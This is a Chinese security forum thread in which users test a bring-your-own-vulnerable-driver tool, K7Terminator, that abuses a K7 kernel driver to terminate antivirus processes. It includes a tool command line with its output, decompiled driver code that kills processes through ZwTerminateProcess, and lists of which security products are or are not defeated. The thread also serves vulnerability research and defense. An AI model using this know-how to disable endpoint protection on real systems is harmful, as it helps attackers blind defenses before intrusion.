#CVE-2025-52915 #CVE-2025-1055 VulnDriver

UNknownOoo

ulyanov2233 发表于 2025-9-11 13:29
我这里闪一下就自退不知道怎么回事，名字也改了

用cmd执行并提供参数

UNknownOoo

aboringman 发表于 2025-9-11 12:36
前

也许win11系统不行？我这边win10可以正常终止的

ulyanov2233

UNknownOoo 发表于 2025-9-11 13:43
也许win11系统不行？我这边win10可以正常终止的

更正一下。eset可以被这个驱动杀死

lsop1349987

win10 emsi byovd执行kill

1. 2025/9/11 13:55:47
   
2. 行为监控检测 可疑行为 "ServiceInstallation" 来自于 C:\Users\user000\Desktop\K7Terminator.exe (SHA1: 2EA0C38C0ABDC1860CFCA89B968E4ABEB175D6A2)
   
3. 
   
4. 2025/9/11 13:55:49
   
5. 通知： "在以下程序中发现了可疑行为： C:\Users\user000\Desktop\K7Terminator.exe" .
   

复制代码

avast、Avira、金山毒霸测试成功
mcafee+hmpa测试成功（win11，关闭内核隔离内所有选项，包括本地安全机构保护和驱动阻止列表）360非核晶执行杀exe
drweb可拦截（非默认设置），LEP无效

wowocock

aboringman 发表于 2025-9-11 12:36
前

else if ( v5[4] >= 4u )
          {
            v13 = *(unsigned int **)(a2 + 24);
            Process = 0i64;
            v14 = (void *)*v13;
            ProcessHandle = 0i64;
            v3 = PsLookupProcessByProcessId(v14, &Process);
            if ( v3 >= 0 )
            {
              v3 = ObOpenObjectByPointer(Process, 0, 0i64, 0, 0i64, 0, &ProcessHandle);
              if ( v3 >= 0 )
                v3 = ZwTerminateProcess(ProcessHandle, 0);
            }
            if ( ProcessHandle )
              ZwClose(ProcessHandle);
            if ( Process )
              ObfDereferenceObject(Process);
            goto LABEL_100;
          }

__int64 __fastcall sub_140001680(HANDLE ProcessId)
{
  NTSTATUS v1; // ebx
  const char *ProcessImageFileName; // rax
  const char *v3; // rdi
  unsigned __int8 (__fastcall *SystemRoutineAddress)(PEPROCESS); // rax
  unsigned __int8 (__fastcall *v5)(PEPROCESS); // rax
  struct _UNICODE_STRING DestinationString; // [rsp+40h] [rbp-18h] BYREF
  PEPROCESS Process; // [rsp+68h] [rbp+10h] BYREF
  HANDLE ProcessHandle; // [rsp+70h] [rbp+18h] BYREF

  Process = 0i64;
  ProcessHandle = 0i64;
  v1 = PsLookupProcessByProcessId((HANDLE)(unsigned int)ProcessId, &Process);
  if ( v1 >= 0 )
  {
    ProcessImageFileName = (const char *)PsGetProcessImageFileName(Process);
    v3 = ProcessImageFileName;
    if ( ProcessImageFileName )
    {
      if ( !stricmp(ProcessImageFileName, "csrss.exe")
        || !stricmp(v3, "smss.exe")
        || !stricmp(v3, "lsass.exe")
        || !stricmp(v3, "winlogon.exe")
        || !stricmp(v3, "svchost.exe")
        || v3[1] == 55 && ((*v3 - 75) & 0xDF) == 0 )
      {
        v1 = 0xC0000022;
      }
      else
      {
        if ( (unsigned int)dword_140006084 < 8 )
          goto LABEL_17;
        RtlInitUnicodeString(&DestinationString, L"PsIsProtectedProcess");
        SystemRoutineAddress = (unsigned __int8 (__fastcall *)(PEPROCESS))MmGetSystemRoutineAddress(&DestinationString);
        if ( SystemRoutineAddress && SystemRoutineAddress(Process) )
        {
          v1 = -1073740014;
          goto LABEL_20;
        }
        RtlInitUnicodeString(&DestinationString, L"IsProtectedProcessLight");
        v5 = (unsigned __int8 (__fastcall *)(PEPROCESS))MmGetSystemRoutineAddress(&DestinationString);
        if ( v5 && v5(Process) )
        {
          v1 = 0xC0000712;
        }
        else
        {
LABEL_17:
          v1 = ObOpenObjectByPointer(Process, 0, 0i64, 0, 0i64, 0, &ProcessHandle);
          if ( v1 >= 0 )
            v1 = ZwTerminateProcess(ProcessHandle, 0);
        }
      }
    }
  }
LABEL_20:
  if ( ProcessHandle )
    ZwClose(ProcessHandle);
  if ( Process )
    ObfDereferenceObject(Process);
  return (unsigned int)v1;
}
这种驱动是在是太多了。

wowocock

第一个是无脑杀，第二个好歹给PPL类进程留点面子。顺便说下火绒应该很快将自己的进程升级为PPL了。

UNknownOoo

lsop1349987 发表于 2025-9-11 14:00
win10 emsi byovd执行kill

emsi应该是拦截了非可信程序安装服务的行为，有条件的话可以测试下在安装了k7环境下使用LPE模式终止进程

具体利用方式在blog原文里有视频演示

Rukia

UNknownOoo 发表于 2025-9-11 14:41
emsi应该是拦截了非可信程序安装服务的行为，有条件的话可以测试下在安装了k7环境下使用LPE模式终止进程
...

LPE模式
BEST 也被摸碎了

另外一个
BEST 反篡改生效了

wowocock

UNknownOoo 发表于 2025-9-11 14:41
emsi应该是拦截了非可信程序安装服务的行为，有条件的话可以测试下在安装了k7环境下使用LPE模式终止进程
...

这种在驱动中直接调用ZwTerminateProcess的，目前没有很好的处理方式。估计除了禁止驱动加载，或拦截对驱动的控制码操作，没有其他好的办法。

ulyanov2233

卡巴成功拦截，并且击杀exePS C:\Users\kasperky> .\k7Terminator.exe -m byovd -p 19392

Mode: BYOVD
[+] Creating service: C:\Users\kasperky\K7RKScan.sys
[+] Driver loaded

Targeting PID: 19392
[-] IOCTL failed for PID: 19392 (Error: 0x5)
[-] Failed PID: 19392

事件: 进程已终止
应用程序: K7Terminator.exe
用户: DESKTOP-RMLF8R4\kasperky
用户类型: 发起者
组件: 系统监控
结果描述: 已终止
类型: 木马
名称: PDM:Trojan.Win32.Generic
威胁级别: 高
对象类型: 进程
对象路径: C:\Users\kasperky
对象名称: K7Terminator.exe
MD5: BB05468F0BFD3738E38F5E680FC13CCD